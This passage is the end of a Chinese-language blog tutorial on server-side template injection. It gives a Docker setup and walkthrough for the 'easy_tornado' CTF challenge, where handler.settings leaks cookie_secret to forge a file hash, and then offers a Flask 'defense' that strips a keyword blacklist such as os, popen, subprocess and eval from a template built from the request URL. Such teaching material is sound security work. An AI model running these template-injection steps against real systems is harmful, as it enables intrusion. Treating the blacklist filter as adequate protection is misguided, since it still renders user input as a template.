<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">version: &quot;2&quot;</span><br><span class="line"></span><br><span class="line">services:</span><br><span class="line"></span><br><span class="line">  web:</span><br><span class="line">    image: ctftraining/huwangbei_2018_easy_tornado</span><br><span class="line">    #build: .</span><br><span class="line">    restart: always</span><br><span class="line">    ports:</span><br><span class="line">      - &quot;0.0.0.0:your_port:5000&quot;</span><br></pre></td></tr></table></figure>

<p>进入目录启动</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>

<p>访问（比如说127.0.0.1:5000）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vps:your_port</span><br></pre></td></tr></table></figure>

<h5 id="攻击-1"><a href="#攻击-1" class="headerlink" title="攻击"></a>攻击</h5><p>进去可以发现3个文件</p>
<p><img src="../../../../img/ssti/t1.png" alt></p>
<p>进入welcome.txt看到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/welcome.txt</span><br><span class="line">render</span><br></pre></td></tr></table></figure>

<p>进入hints.txt看到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/hints.txt</span><br><span class="line">md5(cookie_secret+md5(filename))</span><br></pre></td></tr></table></figure>

<p>即先将filename md5加密，再将cookie_secret和加密后的filename进行md5加密</p>
<p>进入flag.txt看到</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/flag.txt</span><br><span class="line">flag in /fllllllllllllag</span><br></pre></td></tr></table></figure>

<p>尝试访问/fllllllllllllag，发现错误</p>
<p><img src="../../../../img/ssti/t2.png" alt></p>
<p>猜测msg处存在ssti，经过测试，确实存在</p>
<p><img src="../../../../img/ssti/t3.jpg" alt></p>
<p><img src="../../../../img/ssti/t4.jpg" alt></p>
<p>在tornado有个handler.settings对象，handler 指向RequestHandler，而RequestHandler.settings又指向self.application.settings，那么handler.settings就指向RequestHandler.application.settings了</p>
<p>使用handler.settings获得cookie_secret</p>
<p><img src="../../../../img/ssti/t5.jpg" alt></p>
<p>构造filehash即可拿flag</p>
<h3 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">@app.errorhandler(404)</span><br><span class="line">def page_not_found(e):</span><br><span class="line">    def safe_jinja(s):</span><br><span class="line">        blacklist = [&apos;_&apos;,&apos;import&apos;,&apos;getattr&apos;,&apos;os&apos;,&apos;class&apos;,&apos;subclasses&apos;,&apos;mro&apos;,&apos;request&apos;,&apos;args&apos;,&apos;eval&apos;,&apos;if&apos;,&apos;for&apos;,&apos; subprocess&apos;,&apos;file&apos;,&apos;open&apos;,&apos;popen&apos;,&apos;builtins&apos;,&apos;compile&apos;,&apos;execfile&apos;,&apos;from_pyfile&apos;,&apos;config&apos;,&apos;local&apos;,&apos;self&apos;,&apos;item&apos;,&apos;getitem&apos;,&apos;getattribute&apos;,&apos;func_globals&apos;]</span><br><span class="line">        for no in blacklist:</span><br><span class="line">            while True:</span><br><span class="line">                if no in s:</span><br><span class="line">                    s =s.replace(no,&apos;&apos;)</span><br><span class="line">                else:</span><br><span class="line">                    break</span><br><span class="line">        a =  [&apos;config&apos;, &apos;self&apos;]</span><br><span class="line">        return &apos;&apos;.join([&apos;&#123;&#123;% set &#123;&#125;=None%&#125;&#125;&apos;.format(c) for c in a])+s</span><br><span class="line">    template = &apos;&apos;&apos;</span><br><span class="line">    &#123;%% block body %%&#125;</span><br><span class="line">        &lt;div class=&quot;center-content error&quot;&gt;</span><br><span class="line">            &lt;h1&gt;Oops! That page doesn&apos;t exist.&lt;/h1&gt;</span><br><span class="line">            &lt;h3&gt;%s&lt;/h3&gt;</span><br><span class="line">        &lt;/div&gt;</span><br><span class="line">    &#123;%% endblock %%&#125;</span><br><span class="line">    &apos;&apos;&apos; % (request.url)</span><br><span class="line">    return render_template_string(safe_jinja(template)), 404</span><br></pre></td></tr></table></figure>

<p>参考链接：</p>
<p><a href="https://xz.aliyun.com/t/2908#toc-2" target="_blank" rel="noopener">https://xz.aliyun.com/t/2908#toc-2</a></p>
<p><a href="https://p0sec.net/index.php/archives/120/" target="_blank" rel="noopener">https://p0sec.net/index.php/archives/120/</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web/" rel="tag"># web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/02/xss/" rel="next" title="xss">
                <i class="fa fa-chevron-left"></i> xss
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/16/TAMUctf/" rel="prev" title="TAMUctf">
                TAMUctf <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.jpg" alt="Glarcy">
            
              <p class="site-author-name" itemprop="name">Glarcy</p>
              <p class="site-description motion-element" itemprop="description">web小菜鸡</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">24</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://aluvion.github.io/" title="Twings" target="_blank">Twings</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://xi4or0uji.github.io/" title="Xi4or0uji" target="_blank">Xi4or0uji</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://23r3f.github.io/" title="23R3F" target="_blank">23R3F</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://zszcr.github.io/" title="zs0zrc" target="_blank">zs0zrc</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞介绍"><span class="nav-number">1.</span> <span class="nav-text">漏洞介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSTI-in-flask"><span class="nav-number">2.</span> <span class="nav-text">SSTI in flask</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#路由"><span class="nav-number">2.1.</span> <span class="nav-text">路由</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#渲染方法"><span class="nav-number">2.2.</span> <span class="nav-text">渲染方法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#模板渲染"><span class="nav-number">2.3.</span> <span class="nav-text">模板渲染</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#攻击方法"><span class="nav-number">2.4.</span> <span class="nav-text">攻击方法</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#获取python的基本类"><span class="nav-number">2.4.1.</span> <span class="nav-text">获取python的基本类</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#文件操作"><span class="nav-number">2.4.2.</span> <span class="nav-text">文件操作</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#执行命令"><span class="nav-number">2.4.3.</span> <span class="nav-text">执行命令</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#Bypass"><span class="nav-number">2.4.4.</span> <span class="nav-text">Bypass</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#动手实践"><span class="nav-number">2.5.</span> <span class="nav-text">动手实践</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#环境搭建"><span class="nav-number">2.5.1.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#攻击"><span class="nav-number">2.5.2.</span> <span class="nav-text">攻击</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSTI-in-tornado"><span class="nav-number">3.</span> <span class="nav-text">SSTI in tornado</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#动手实践-1"><span class="nav-number">3.1.</span> <span class="nav-text">动手实践</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#环境搭建-1"><span class="nav-number">3.1.1.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#攻击-1"><span class="nav-number">3.1.2.</span> <span class="nav-text">攻击</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#防御"><span class="nav-number">4.</span> <span class="nav-text">防御</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Glarcy</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
